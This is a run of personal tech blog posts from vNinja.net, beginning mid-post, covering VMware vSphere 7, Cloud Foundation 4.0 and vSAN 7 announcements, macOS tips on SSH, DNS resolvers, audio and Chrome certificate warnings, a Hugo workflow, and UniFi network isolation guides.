Kubernetes workloads in a standalone vSphere 7 cluster. While I do understand some of the reasoning behind this, like the dependency on NSX-T to do this properly, it’s also a major stumbling block for potential customers. Updated: A previous version of this post claimed that vSAN was also a requirement for Kubernetes WDs, and that is not the case. Kubernetes WD’s can run on other storage solutions, supported by VCF, and does not require vSAN." Todays announcement begs the question; Is vSphere 7 the platform that consolidates containers and VMs, or is that platform in reality Cloud Foundation 4.0? In order to get vSphere with Kubernetes up and running, this is a minimum of seven hosts required. Four for the Management Workload Domain, and a minimum of three hosts for the Kubernetes WD. That’s a tall order that comes with a hefty price tag, if someone wants to dip their toes in the sea of containers. Of course, customers can still look at PKS as an alternative with a smaller footprint, or even things like NetApp Kubernetes Service, but in my opinion it would be better if existing “standalone” vSphere estates could take on these workloads, without the requirement for a full Cloud Foundation stack powering it. Something like running small Kubernetes-based workloads in a resource pool in vSphere would be very useful, even if it won’t scale indefinitely or even to a production ready state. It’s not like the bits to do are not already there, as vSphere 7 and vCenter 7 supports it in the VCF construct. If VMware really wants to own this space, and bring containers into the administrative fold of the vSphere Admins (VI Admins), the absolute requirement for Cloud Foundation needs to be relaxed — even if it’s just in a downscaled non-production ready scenario. To get the admins aboard, they need to be able to play. Very few will have the resources to play with this, if the requirements stay as they are. Hopefully this is something that will get adressed down the road, as not everyone, even though I would like them to be, is a potential Cloud Foundation customer. Update 12. March 2020 # I have received a lot of feedback, both public and private on this post, and many agree that the initial hurdle to get this up and running is indeed steep. That being said, there are alternatives available — also from VMware. VMware Tanzu Kubernetes Grid can be run in your existing VMware vSphere estate, and this does eliminate the Cloud Foundation requirement to get started. VMware Tanzu Kubernetes Grid can run on vSphere 6.7 and newer, as well as VMware Cloud on AWS and others and might just be the best way forward for non-greenfield deployments. For vSphere 6.5 PKS is the way to go, and there a transition path from PKS to TKG available, as well. Also note that it seems like the Cloud Foundation requirements might just be relaxed in future releases, and that the deployment method for enabling vSphere with Kubernetes might change down the road. For now, it is what it is, but as always — things are going to change. Time to get the lab fired up! Update 02. April 2020 # Kit Colbert has published How to Get vSphere with Kubernetes which highlight the reasoning behind this: Given that multiple components were now needed (ESXi, vCenter, NSX), orchestration was necessary to coordinate lifecycle and health management. SDDC Manager was the perfect fit. As it turns out, vSphere + NSX + SDDC Manager = VMware Cloud Foundation (VCF). And we’ve made the integration with Kubernetes work seamlessly with our recently announced VCF 4. So there it is. For now, if you want vSphere with Kubernetes, VCF is the way to go. --- # VMware Cloud Foundation 4.0 Announced URL: https://vNinja.net/2020/03/10/vmware-cloud-foundation-40-announced/ Date: 2020-03-10 Author: christian Tags: vSphere, Cloud Foundation, VMware During todays Online Launch Event App Modernization in a Multi-Cloud World VMware announced the next generation of VMware Cloud Foundation; version 4.0. This release includes support for the new versions of vSphere and vSAN as well as updates to the vRealize Suite and NSX. NSX is not released in a new version at this time. but this Cloud Foundation update moves its requirement from NSX-V to NSX-T. Here are a few of the highlights that the new release brings to market: vSphere with Kubernetes on VMware Cloud Foundation Now this is the big one! Cloud Foundation can now serve as the private cloud infrastructure for both traditional VMs and container based workloads. Simply put, VM admins get to use the tools they are used to like vCenter to manage resources, and developers gets access to known APIs for provisioning. This “best of both worlds” approach provides automated deployment of containerized Compute, Storage, and Network resources, without requiring specialized knowledge of containers. Just like everything else in the Cloud Foundation world it works in a Workload Domain nomenclature, so does the Kubernetes integration. Spin up a Kubernetes Workload Domain in Cloud Foundation through the SDDC Manager, and your datacenter is ready to onboard containers. This also allows for Lifecycle Management of the entire software stack: vSphere to K8s runtime from a single interface. Reduced Management Domain Footprint The Management Domain (WD) footprint has been reduced, since the vCenter PSC’s are now embedded and the NSX Managers and Controllers are integrated. Lifecycle Management - Ease of Upgrades and Patching Lifecycle Management has been significantly simplfied Multi-Instance Management Through a new Federation feature, SDDC Manager now supports viewing and managing multiple Cloud Foundation instances. This includes viewing patching, upgrades, maintenance and remediation operations. --- # VMware vSAN 7 Announced URL: https://vNinja.net/2020/03/10/vmware-vsan7-announced/ Date: 2020-03-10 Author: christian Tags: vSphere, vSAN, VMware With vSphere 7 comes vSAN 7, and it comes with a good set of new features and improvements. Here is a quick rundown of the highlights. Simpler and More Complete Lifecycle Management at Scale # vSphere Lifecycle Manager (vLCM) – Unified software and firmware management # Uses desired-state model for all lifecycle operations Monitors compliance “drift” Remediates back to desired state Built to manage server stack in cluster Hypervisor Drivers Firmware Modular framework supports vendor firmware plugins Dell HPE Integrated File Services Managed through vCenter # Native file services for vSAN # vSAN 7 offers file services, provided through NFS v4.1 & v3 Quota support Continued Integration of Cloud Native Storage in vSphere and vSAN # File-based persistent volumes on vSAN Supports vVols Enables persistent volume encryption and snapshots Supports volume resizing Supports a mix of tooling Wavefront Prometheus vRealize Operations Improved VM Placement Intelligence with Stretched Clusters # Integrated DRS awareness of Stretched Cluster configurations # Prioritizes I/O read locality over any VM site affinity rules Instructs DRS not to migrate VMs to desired site until resyncs complete Reduces I/O across ISL in recovery conditions Improve VM read performance Freeup ISL for resyncs to regain compliance Improved Resilience with Stretched Cluster and 2-Node Topologies # “Replace Witness” workflow will now invoke an immediate repair to regain compliance Applies to stretched cluster and 2-node topologies Minimizes interruption with site-level protection Intelligent Capacity Management for Stretched Cluster Topologies # Prevents capacity imbalance to impact VM uptime in stretched clusters Redirects active I/O to the site with available capacity Allows for VMs to continue non-disruptively in capacity strained conditions Assumes rebalancing within site has taken place Unified Cloud Analytics for your VMware Powered Environments # VMware Skyline integration with vSphere Health and vSAN Health # Skyline Health — All Customers Skyline Advisor — Production & Premier Customers Skyline Advisor — Premier Customers Improved Consistency in VM Capacity Reporting # Consistent VM-level capacity usage across vCenter UI and APIs # Accurately accounts for used capacity of: Thin provisioned VMs SwapObject NamespaceObject Reduces confusion on capacity consumed by a VM Easily View Memory Consumption for vSAN services # New vSAN memory metric in the vSAN performance service # vSAN memory metric available in API and UI Time-based memory consumption details per host View consumption as a result of hardware and software configuration changes Adding devices or disk groups Enabling/disabling data services Improved Awareness of vSphere Replication Data # Visibility of vSphere Replication objects in vSAN capacity views # Easily identify objects created by and used with vSphere Replication New vSphere Replication object identity type in “Virtual Objects” listing New vSphere Replication categories for cluster-level capacity view Increase Efficiency with the Latest Hardware # Support for larger capacity devices # 32 TB physical capacity 1 PB in logical capacity (DD&C) Potential for Improved deduplication ratios with larger devices Designed to minimize data movement for support of new devices Flexible Serviceability for NVMe Devices Improves Uptime # Native support for planned and unplanned maintenance with NVMe hot plug # Hot plug support for both vSphere and vSAN Better TCO through RASM Reliability Availability Serviceability Manageability Minimize host restarts Reduces complexity of steps to service systems Select OEM platforms only Improved Flexibility for Applications using Shared Disks on vSAN # Removal of Eager Zero Thick (EZT) requirement for shared disk in vSAN # Eager Zero Thick (EZT) requirement eliminated for vSAN powering Oracle RAC on vSAN Applies to all shared virtual disks using multi-writer flag (MWF) Object Space Reservation (OSR) storage policy rule set to 100 is no longer necessary for shared disks Closing Comments # All in all, great improvements in this vSAN release. File services with NFS is interesting, as well as the integrated DRS awareness of Stretched Cluster configurations. Better visibility for vSAN memory resource utilization is also very welcome! Improved Lifecycle Management is also something that I’ve been looking forward to, and should make day 2 operations of a vSAN environment even better than it has been. --- # macOS Keeps Asking for SSH Passphrase URL: https://vNinja.net/2020/03/05/macos-asking-for-ssh-passphrase/ Date: 2020-03-05 Author: christian Tags: macOS, SSH I’m a big fan of Public Key authentication for SSH but I recently ran into an issue after adding my Public Key to a couple of new Linux VMs I use. The problem was that macOS kept asking for the SSH passphrase when connecting to them, which kind of defeats the purpose of using Public Key authentication in the first place. Thankfully, the solution is pretty simple. in ~/.ssh/config add the following to the end of the file, to allow usage of the Apple Keychain for SSH: Host * UseKeychain yes This simply allows the usage of the stored Public Key passphrase in the Keychain for all hosts. Note: You can specify this setting for specific hosts too if you want to, by replacing the asterix with the hostname and/or IP address for the host. Apparently this was a change done in macOS Sierra, and I don’t know why I haven’t come across it before now! --- # Norwegian vExperts 2020 URL: https://vNinja.net/2020/02/24/norwegian-vexperts-2020/ Date: 2020-02-24 Author: christian Tags: vExpert, VMware VMware has just announced the list of vExperts for 2020, and I’m honored to be awarded for the tenth year in a row! That being said, I’m happy to see the list of Norwegian vExperts grow! It wasn’t that many years ago that we were only two (or for the first couple of years, only one!), now the count is at 12! You can check the entire official vExpert Directory here, but here is a list of the Norwegian vExpert Class of 2020: Name Twitter Blog Morten Werner Forsbring @forsbring n/a Frode Garnes @frode_garnes n/a Bengt Grønås @bgronas blog.bengt.no Rudi Martinsen @RudiMartinsen rudimartinsen.com Christian Mohn @h0bbel vNinja.net Bjørn-Tore Nikolaisen @btn003 n/a Børre Nygren @borrenygren n/a Roger Samdal @rsamdal vfokus.no Marius Sandbu @msandbu) msandbu.org Bjørn Sørensen @bjosoren tech.iot-it.no Lars Trøen @larstr core-four.info Andreas Vedå @Andyve vedaa.net That’s quite a list! Out of those 10, I’d like to especially congratulate Frode Garnes, Bjørn Sørensen and Andreas Vedå who all earned their first star this year. Well done! I’ve also created a Twitter list for those on the list above with public Twitter profiles: Norwegian vExperts 2020. --- # rPI+Volumio+HiFiBerry=Awesome URL: https://vNinja.net/2020/02/14/using-rpi-volumio-hifiberry/ Date: 2020-02-14 Author: christian Tags: rPI, HifiBerry, Volumio, Audio, IoT My audio setup is a old NAD 326 BEE stereo amplifier with a couple of Dali Blue 5005 speakers. I also have a turntable connected to it, and it sounds beautiful. Previously I had an Amazon Echo Dot connected to the amp, to provide me with Spotify Connect, but it turns out there are a couple of issues with it. Mainly, the digital to analog converter (DAC) in the Echo Dot left a lot to be desired. Secondly, it was cumbersome to use when there is more than one user. In order for anyone else in the household to use it, Amazon profiles needed to be configured for each, and we then had to switch profiles for it be available to a given user. Not very user friendly, and since none of us really enjoy talking to our devices, it was not ideal by any means. The solution for enabling streaming to an old (but awesome) amp, was using the Raspberry Pi 3 B+ I had laying around. I added a HiFiBerry DAC+ HAT to it, and enclosed it in a nice little case that also comes from HifiBerry. As far as software goes, it’s installed with Volumio - The Audiophile Music Player. This is a “self contained” distribution that supports, amongst many, the HifiBerry DAC. It offers a very simple installation procedure: Stick it on a SD-card and boot up the rPI. If you are looking for complete installation details see Re-Use Your Old Raspberry PI as a Music Player. Once it connects to my network, I can just visit http://volumio.local in my browser (when at home) to open it up, and start streaming web radio or play my local music library from my NAS. If I want to stream from Spotify, or even use Apple Airplay, that works too. Volumio just pops up as an available device when I’m on my home network. When it comes to profiles, which was an issue with the old setup, Volumio has none. If no-one is streaming to it, it’s available. If someone else in the house is using it, well, then they “own” it and I can’t take over (Unless i connect to the web frontend and stop the streaming). This is much easier than having to switch profiles to enable streaming for a given user. It also comes with a nice web frontend to see what’s going on. Of course, there is also the added benefit of removing a voluntary listening device from my living room, which can’t be a bad thing. --- # My Hugo and Visual Studio Code Workflow URL: https://vNinja.net/2020/02/12/my-hugo-workflow/ Date: 2020-02-12 Author: christian Tags: Hugo, Visual Studio Code, Workflow Since moving this site over to Hugo back in 2018, I’ve developed a workflow that seems to work pretty well. Given that I see that a lot of others are also moving over to static site generators, and I wasn’t exactly ahead of the curve on it myself, I figured I would try to write up how I work with Hugo and Visual Studio Code on my MacBook to generate content. Editor of Choice # As mentioned, I use Visual Studio Code as my editor, with a set of extensions: Hugo Snippets Markdown Preview Github Styling markdownlint Markdown Shortcuts Markdown All in One Better TOML Bootstrap 4, Font awesome 4, Font Awesome 5 Free & Pro snippets Paste Image There is probably some overlap between a couple of these extentions, but it seems to work just fine. Paste Image Config # Out of that list I would like to highlight Paste Image as my absolute favorite. In short, it allows for pasting screenshots directly from clipboard, and into a MarkDown document. In addition to this, it also takes care of saving the image in the correct place, which saves a lot of manual work. All my images reside in /static/img on my local file system, which Hugo then renders as /img/<filename> in the generated URL. This setup also puts the screenshots in /img/name-of-the-markdown-file/ automatically, which makes everything just a bit easier to manage. "pasteImage.path": "${projectRoot}/static/img/${currentFileNameWithoutExt}", "pasteImage.namePrefix": "${currentFileNameWithoutExt}_", "pasteImage.prefix": "/img/", "pasteImage.basePath": "${projectRoot}/static/img" Hugo # config.toml # Within my Hugo config.toml I’ve set code as my preferred editor, like this: # Set content editor newContentEditor = "code" Note, for this to work code needs to be added to your system path" Hugo Shortcodes # In order to speed up writing posts, I have also created a few custom Hugo shortcodes for Bootstrap4. These makes it easy to add things like Bootstrap alerts in my posts. These are then added to Visual Studio Code, via the markdown.json file. The other snippes I use, come from the Hugo Snippets extension. Custom Zsh aliases and functions # I have also added a couple of Hugo and site specific aliases and functions to my .zshrc file: #Hugo Specific local BLOG_PATH=<the path to my Hugo files> alias vninjad="cd '$BLOG_PATH'" function vninjaserv() { cd $BLOG_PATH open "/Applications/Google Chrome.app" http://localhost:1313 hugo server -D -F } function hugonew() { cd $BLOG_PATH && hugo new content/post/$1.md } # Image Optimization alias imgoptim="/Applications/ImageOptim.app/Contents/MacOS/ImageOptim" BLOG_PATH is just a variable that holds the location of the local Hugo files. vninjad, basically just lets me jump into my local file location for this site. vninjaserv jumps to the same directory, opens Chrome for local previews, and starts the local Hugo server. hugonew jumps to the same location as vninjad, but it also runs the Hugo command to create a new post with a name, given in the argument. For example, to create this very post, I ran hugonew my-hugo-workflow. This pops up Visual Studio Code, since that’s the editor I’ve defined in config.toml, with my predefined front matter template for posts. If you want to specify which editor to use, you can add --editor="<your_editor>" to the end of the line. imgoptim basically just calls ImageOptim from the command line, and let’s me automatically optimize the images in a given directory, which is really useful in combination with the automatic screenshot features that Paste Image provides. All in all, pretty awesome and it does make it really quick to write something especially when you can have your terminal window available right in Visual Studio Code! Once I’m happy with something locally, I’ll just commit it to GitHub and let Netlify take care of the rest. --- # macOS: Using Custom DNS Resolvers URL: https://vNinja.net/2020/02/06/macos-custom-dns-resolvers/ Date: 2020-02-06 Author: christian Tags: macOS, DNS Some times there is a need to use custom DNS servers for some domains, in my case specifically for access to the new lab environment we are building at work (more on that later, this is one beefy lab!) One way of doing this, is adding custom DNS servers to /etc/resolv.conf but in macOS you really shouldn’t be editing that file manually, as it often gets overwritten or otherwise edited by VPN clients and such. Thankfully, there is a better way to create persistent and manageable custom domain specific DNS settings. Make a new folder called /etc/resolver/ Inside that folder, create a new file with the name of the domain you want custom DNS settings for, in this case myhugelab.local Edit that file, and add your custom domain, search path and nameservers. My example file looks like this domain myhugelab.local search myhugelab.local nameserver 10.0.0.53 nameserver 10.0.0.54 Save the file, and run sudo killall -HUP mDNSResponder in your terminal of choice to force a DNS refresh Verify that the new DNS settings are in place by running scutil --dns and looking at the output for the entries added in step 3. resolver #8 domain : myhugelab.local search domain[0] : myhugelab.local nameserver[0] : 10.0.0.53 nameserver[1] : 10.0.0.54 Check that name resolution works! This way I can redirect host name resolution to the lab DNS servers, without having to do anything but connect to that network first. Doing this with /etc/resolver/domainname files, is a lot cleaner than other methods, requires less work and is much easier to keep track of. I’d call that a win every day! And remember, it’s always DNS. Unless it’s NTP. --- # macOS: Using and creating Multi-Output Sound Devices URL: https://vNinja.net/2020/02/04/macos-multi-output-devices/ Date: 2020-02-04 Author: christian Tags: macOS I recently got a pair of new displays for the office, a couple of lovely Dell U2719DC’s. These offer USB-C connectivity, which is really nice, and makes it easy to connect my MacBook when I’m in the office. Connected to one of the displays is a Logitech Z337 set of speakers with a sub, since there is no built-in speakers in these displays. The problem I had with that setup, is that macOS doesn’t let me easily differenciate between the two as they are named exactly the same, sometimes creating confusion as to which of them should be the sound output to the speakers. Some times macOS selects the wrong one when I connect, and I get no sound until I switch to the correct one. As far as I can tell, there is also not an easy way in macOS to rename a display, so it’s hard to know which one is which. Of course, I could potentially connect an audio splitter cable, and connect both displays to the speakers that way, but I figured there had to be a way to do that in software. Luckily, macOS lets you do exactly that natively. macOS Audio Midi Setup, which you can find in the Applications->Utilities folder is the key here. This little tool lets you, amongst other things, create what’s called a Multi-Output Device which is what I’m using it for. In short, an Multi-Output Sound Device is just a collection of sound devices, presented as one. By creating one of these, I can make a new sound device that contains both my displays, and use that as my output. That way, it does not really matter where the speakers are connected, as long as they are connected to either one of the displays. Configuring a Multi-Output Sound Device in macOS # Start Audio Midi Setup from Applications->Utilities This will show the available audio devices. Click on the small + on the bottom left, and select Create Multi-Output Device. Select the outputs you want to include in output group. By default it will also enable drift correction, but since I really only have one output I deselected that. Rename the Multi-Output Device to something that makes sense to you, by clicking its name. Use the new Multi-Output Device as your output, instead of any of the defaults, and you’re ready to go. That’s it! There are of course other use cases for this, like for instance connecting several headsets to a single Mac, or even several speaker systems. --- # macOS: Catalina Chrome Self-signed Certificate Issues URL: https://vNinja.net/2019/12/03/macos-catalina-chrome-cert-issues/ Date: 2019-12-03 Author: christian Tags: macOS, TLS, Security, Certificates, VMware, vSphere, Chrome Way back in 2017, the CA/Browser Forum voted on Ballot 193 – 825-day Certificate Lifetimes, which passed. In short, this means that CA issued certificates issued after March 1st 2018 can not have a validity period longer than 825 days. macOS Catalina implements this change, as described in Requirements for trusted certificates in iOS 13 and macOS 10.15. So it’s been a long time coming, but most of us are just now realizing how this affects us. This also applies to Self-signed certificates, like the ones issued for VMware vSphere and related solutions, like NSX-T and others, where the default age is 10 years or so. Chrome on macOS is a bit more strict than Safari and Firefox, and doesn’t display an obvious way of proceeding if the certificate expiry date is more than 825 days from the time it was issued: As shown above, there is no “continue at your own risk” option here. There are, however, a couple of ways to work around this. Method 1 # Cheat! Chrome has a “hidden” option to bypass certificate issues. Simply type thisisunsafe into the browser window, and it will magically let you continue to the site! Granted, this isn’t a permanent solution in any way, but it might help you out of a pickle. Method 2 # The second method is more permanent that Method 1, but also not advisable unless this is in a lab environment. Import the certificate into your macOS keychain. Open the certificate in Chrome, and simply drag the certificate icon to your desktop (or somewhere else) Find the exported certificate, and double-click on it to import it into your keychain. It should then appear under Category -> Certificates. Reload Chrome, and you should be able to open the site without issues. Method 3 # Start Chrome with flags. Chrome also has a few command line flags, or arguments, and one of them is -ignore-certificate-errors. Guess what that does? I have created an alias on my MacBook that looks like this: chrome-cert='open -a "Google Chrome" --args -ignore-certificate-errors' So if I need to turn off certificate error warnings for a period of time, all I have to do is quit Chrome, if it is already running, and start it in terminal with the chrome-cert command. Obviously the best way to permanently fix this is to use proper CA issued certificates (I guess that’s Method 4, really), but at least there are workarounds that allows the continued usage of Chrome to manage your systems if replacing the certificates is not an option. I’m sure VMware, and others, will implement the max age of 825 days going forward but that is going to take some time — But in fairness, the decision to not support >825 day certificates was taken back in 2017 so it should really have been taken care of already. --- # Guide: Creating an Isolated Ubiquiti Unifi IoT Network URL: https://vNinja.net/2019/08/12/unifi-iot-networks/ Date: 2019-08-12 Author: christian Tags: networking, ubiquiti, USG, IoT, UniFi As I’ve covered before, I run my home network mostly on Ubiquiti UniFi hardware. Since this offers a lot of nifty possibilities, I figured I should try to isolate all my “IoT”-devices in a separate network, while still making them accessible. After all, you don’t want a security issue on some sensor/automation thing you have in your house to be able to access and encrypt your familiy photos, right? The thing that sits in the corner and controls the color of your lightbulbs, do not need to have access to the same network as your other data. Right now, my list of devices looks like this: Amazon Echo(s) Google Chromecast and Google Home Mini Phillips Hue bridges Ikea Trådfri bridges Verisure Alarm System Most of these are fine to just move into an isolated network, like the setup I’ve outlined previously, but not all of them. The Phillips Hue Bridge, IKEA Trådfri Gateway and the Verisure Gateway were all fine with being moved over to the new VLAN. This makes sense, as once they are configured all they do is communicate out to their respective cloud services — and the management apps for them connect to that service, not directly to the device itself. The Amazon Echos and Google Chromecast/Home Mini is a different story though. This also makes sense, since these devices are supposed to receive data from your your other devices - directly. My primarily use case for them is Spotify Connect so I can stream music to my stereo setups (I have an old analog NAD receiver with some nice Dali speakers that do not have digital connections at all), so being able to actually stream music to them is rather useful. The following information was correct at the time of posting, based on a setup with 1 x UniFi Security Gateway 3P (4.4.41.5193700), 1 x UniFi Switch 8 POE-60W (4.0.42.10433) and 5 x UniFi AP-AC-Mesh (4.0.42.10433) 1. Creating the Isolated IoT Network # The process of creating, and isolating, a new IoT network is the same procedure as I have outlined before: Creating Isolated Networks with Ubiquiti UniFi. Once you have this network in place, be it either via WiFi or via physical VLAN tagging on a switch port (or both), you can start moving your devices over. The Phillips Hue Bridge, IKEA Trådfri Gateway and the Verisure Gateway was simple, since they are physically cabled, just move them over to a configured port on the UniFi Switch. These devices then got a new IP assigned to them from the new network definition, and their management apps still worked without problems. 1.2 Configuring the mDNS reflector # For the Amazon Echos and Google Chromecast/Home Mini there are some other requirements that need to be in place. The first thing is to enable the Multicast DNS (mDNS) reflector. mDNS is a discovery protocol that enables discovery of the devices. By default mDNS does not flow between VLANs, so in order to make discovery of these devices possible once they are in a separate VLAN, the Unifi mDNS Reflector needs to be enabled on the controller. Log into your controller, and go to Settings->Services->MDNS and enable it. This enables mDNS requests to traverse the VLANs, and makes discovery across them possible. 1.4 Tweaking firewall rules # The second thing that needs to be done, if it is not already in place, is to tweak the firewall rules between the IoT network and “normal” network. In the setup I’ve outlined previously, all traffic coming from the isolated network is blocked, and in order to be able to reach the Amazon Echos and Google Chromecast/Home devices properly, a new rule needs to be added. Some traffic needs to be allowed back to the clients in the other VLAN, and the easiest way of doing this is by creating an allowed rule for Established and Related TCP/UDP states. In short, this means that connections that are already in place, or related to those established connections will be allowed. This will still secure your networks, as devices in the IoT VLAN will still not be able to traverse the VLANs independently. Give the rule a name that makes sense, enable it and expand Advanced. Find States and select Established and Related. Expand Sources, click on Network and select the “IoT” network you have created. Then go to Destination, select Network again, and choose the network your regular devices is located in. Click on Save to make the rule active. 1.5 Moving Wireless devices # Now, you can start moving your streaming devices. Both Amazon Echo and Google Home Mini/Chromecast are easy to move to a new Wireless SSID. For the Echo I just used the Alexa app on my phone, to move it over the new network — and the Google Home app did the same for the Google Home Mini and the Chromecast. Screenshots # Screenshots taken while connected to another SSID than the “IoT” network. 2 Specific Equipment # 2.1 Getting Sonos to work # Updated September 9th 2019 Michael Ryom has come up with a recipe for enabling Sonos Wireless Speakers in a similar setup. In short, you’ll need to enable UPNP and open TCP/3500 in the firewall from the IoT Network, to your LAN. Check his tweet for screenshots. Conclusion # Once these steps are completed, streaming of data from your laptop/phone/tablet in the “normal” VLAN to the devices in your “IoT” network should still work as before, with the added security of not having them in the same network segment as the rest of your devices. I can still control my lights, and my alarm system, from my phone/tablet without any problems. I do kind of like this. --- # Guide: Creating Isolated Networks with Ubiquiti UniFi URL: https://vNinja.net/2019/08/08/creating-isolated-networks-ubiquiti/ Date: 2019-08-08 Author: christian Tags: networking, ubiquiti, USG, VPN, UniFi Some times you might need to create an isolated network, while still allowing that network to access the internet. Ubiquity UniFi offers the easy option of creating a guest network for this, but that limits traffic between the devices in the same network as well, which might not be desirable. My primary use case for creating an isolated network, is to provide my tenant with his own dedicated network, without exposing anything on my own home network — but I still want him to be able to connect his own devices to each other, if he wants to — or even replacing the AP with something else, should he choose to do so. Another use case might be to create a dedicated network for all of those IoT-devices that keep popping up, like Amazon Echo’s, Google Home and Chromecasts as well as Phillips Hue bridges etc. Creating an IoT network is very similar to what I describe below, but there are some other considerations to take into account as well. I will cover those particulars in a later post. The following information was correct at the time of posting, based on a setup with 1 x UniFi Security Gateway 3P (4.4.41.5193700), 1 x UniFi Switch 8 POE-60W (4.0.42.10433) and 5 x UniFi AP-AC-Mesh (4.0.42.10433) 1. Configuring an Isolated Network # To set up an isolated Network, log into your controller and go to Settings->Networks and click on the +Create New Network button. This opens up the “Create New Network” page, where you need to provide a few details. First off, give the network a name and select Corporate as the Network Purpose. I left the default Network Group of LAN1 in place, since I don’t have anything connected to the LAN2 port of my USG. 1.1 Define a VLAN # Next up, define a VLAN ID that you want to use for this network. This can be any number from 0 to 4095, and you can pick whatever you want here (as long as it’s not 0, which is the default VLAN for everything that doesn’t have one defined). In my setup, I used VLAN ID 42. 1.2 Gateway/Subnet # In the Gateway/Subnet I selected to use 192.168.42.1/24. Again, you can choose whatever network ID you want here, but for consistency I like to use the same numbering as I do for my VLAN. This also has the added perk that you can identify which VLAN a device is connected to, just by looking at the IP address it has been assigned. Once you out in a valid CIDR notation for the gateway IP and subnet, a new button appears called Update DHCP Range that lets you autofill in the DHCP server details further down on the page. Nice touch by Ubiquiti, which saves us some clicks and potential for fat-fingering any of the details. Of course, if you don’t want your DHCP range for this network to start with x.x.x.6 (which is the default), you can override it if you want. 1.2 DHCP # By default, the UniFi Switches provide a DHCP service that assigns IPs to your connected clients, for the network you are defining. The default settings here are fine in most cases, and for this setup I just left them as is. Click on Save and your network will be created. That’s the network definition taken care of, now we need to make sure that clients actually connect to it. There are two main ways of doing that, one is creating a new Wireless Network that is connected to the right VLAN and Network. The other is to tie the VLAN to a given port on the Unify Switch, to ensure that everything connected to that particular port gets the correct network assigned to it. 1.3 Creating a new Wireless Network for your Isolated Network # Creating a new Wireless Network is pretty straight forward. Just head to Settings->Wireless Networks and hit the +Create New Wireless Network button. Give it a Name/SSID, enable the encryption you want and set a Security Key. Next, expand the Advanced Options section, and select Use VLAN. Put in the VLAN ID you defined for your network in 1.1. You can leave the other settings as default. Once a device connects to your new SSID, it will automatically be put into the specified VLAN and receive an IP address from the virtual DHCP server running on that network. You can quickly test this by connecting your phone or tablet to this network, and see if you can reach the internet. 1.4 Assigning a VLAN to a Port on the UniFi Switch # If you need to put a wired device into an isolated network, you can do that by defining the VLAN on the port it is connected to on the UniFi Switch. I have done this, in addition to creating the Isolated Wireless Network in order to prevent my tenant from just removing my AP, and plugging in something else, and then getting direct access to my internal network (Note to self: I should really move away from the using the default VLAN for my main local network) In order to do that, go to Devices and find your Unifi Switch. Click on it, and find the Ports icon. Find the correct port, and click on the dropdown for Switch Port Profile. The dropdown will show you all the available networks, and you can then choose which one to assign to that particular port on the switch. Select your network, and click on Apply. Now, anything that connects to that port on the switch, automatically gets the VLAN ID and assigned IPs you specified for the network. Det default setting of ALL means that the VLAN needs to be tagged on the device itself, and that is not something I want in this scenario. 1.5 Blocking traffic from your new VLAN/Network to your other networks # By default, UniFi allows traffic to flow between networks unless you block it. Since the purpose of this is to isolate the new network from existing ones, we need to pop some new firewall rules into place. Go to Settings->Routing & Firewall and find the Firewall tab. There you’ll get a list of different options, what we are looking for is LAN IN. Select that, and then click on +Create New Rule. Give the rule a name, again this can be anything you want. All the other default settings are OK in this instance, since we’re looking to block traffic. Make sure that Before predefined rules is selected, the same with Enabled. Expand Source and change the Source Type to Network. Once that is done, use the dropdown menu to find the network you want to isolate and select it. Under Destination, change the Destination Type to Network and in the dropdown, select the network you don’t want device in your source network to access. In my case that’s the home.local network. Click on save, and there you go! The rule should now show up under your LAN IN rules. The way it’s set up now, all traffic from all other networks to the new network is allowed, but no traffic is allowed to be initiated from this new network to the network selected in destination above. Once again, connect a phone ot tablet to the new network and use a ping app for your chosen platform to verify that the network is indeed isolated from your other networks. Note: Do not ping any of your other UniFi gateways for this test, since you will be able to ping all gateways that are defined (they are all virtual, really). Try to ping, or otherwise access, something else, or you might think the isolation isn’t working as it should. Repeat this process if you have several networks you want to isolate. Conclusion # So, once this is done, traffic is blocked between the new isolated network (VLAN 42) and your other networks (if you created rules for all of them) — but they still have internet access. The networks now are isolated from each other unless you specifically open up communications between them. Creating isolated networks provides a lot more flexibility than using Guest Networks (which also have their place), while still protecting your internal networks. --- # Win a VMworld US 2019 Pass With Veeam URL: https://vNinja.net/2019/08/08/win-a-vmworld-pass-with-veeam/ Date: 2019-08-08 Author: christian Tags: competition, veeam, vmworld Want to win a VMworld US 2019 pass? # If you want to go to VMworld US 2019 (August 25-29) in San Francisco, and still don’t have a ticket, don’t despair! There is still time, as Veeam is giving away three full conference passes! Get your name in the hat now, and you might just be heading to sunny California! Note:* While Veeam is a sponsor of vNinja.net, the site has nothing to do with the competition itself nor any influence on who wins. --- # VMware Center for Advanced Learning Advanced Architecture Course (CALAAC) URL: https://vNinja.net/2019/07/21/vmware-center-for-advanced-learning-advanced-architecture-course/ Date: 2019-07-21 Author: christian Tags: VMware, Training, CALAAC, CAL, Paris, Architecture Hilton Paris La Defense Back in late April I got notified that I had been accepted to attend the VMware Center for Advanced Learning Advanced Architecture Course, to be held in Paris, France July 9 - 19, 2019. Now that it is done, I find myself on a train from Paris to Nice, rocking out to Hüsker Dü contemplating just what it is that I have been a part of. First things first — this is not a class that can be taken lightly. You can not simply sign up for this, you have to be nominated and either work for VMware or a Partner to be taken into consideration to be accepted. Description # The Advanced Architecture Course is a very comprehensive program covering not just technical content across solutions; but it also includes presentation and business skills, our VMware IT Value Model and Digital Workspace Journey Model, solution design best practices, and internal and industry standard architecture methodologies. Once accepted, there is a ton of pre-work that needs to be done before physically attending the course: The pre-work has been assigned to you. An email from VMware WIRE should be in your inbox. The pre-work is worth 5 points of the overall course score and needs to be completed before Day 1. Please note that it will take approximately 32h to successfully complete this material. An estimated 32 hours of pre-work that needs to be done before attending the class, means that in total this will potentially eat up a total of close to three weeks of your schedule. That is not taking into account the case study that you are required to be intimately familiar with before day 1. Expectations # Complete the pre-work prior attending the course Attend all the 9 days of the course Engage individually in the class, complete some labs activities, and participate in group collaboration activities every day Pass 8 daily Knowledge Check Quizzes during the 9 days Conduct a Team Daily Status/Project report to PMO Develop a Solution Design through team collaboration during the 9 days of the course Present a team presentation of the solution design on last day of the course, defend the solution and answer panel questions In order to pass the course, participants must obtain an overall score of 70% or above. The overall score is a sum of the pre-work, quizzes, class participation and labs (50%), the team collaboration (10%) and final team presentation (40%) People, Process and Technology # The Instructors # We were lucky to have an all-star field of instructors during the training, just look at the team Henry Villar got together: CALAAC Instructors The Attendees # In addition to classes running from 08:00 to around 16:00 every day, you will also need to work on the team presentation that is to be presented on day 9 of the training — Realistically you will need to work into late evening every day of the 8 days in order to get this done. You will stress about it, and you will think that you probably aren’t any good at any of this, and you will be wrong. CALAAC Attendees and Instructors (Photo by Henry Villar) I was lucky enough to be paired 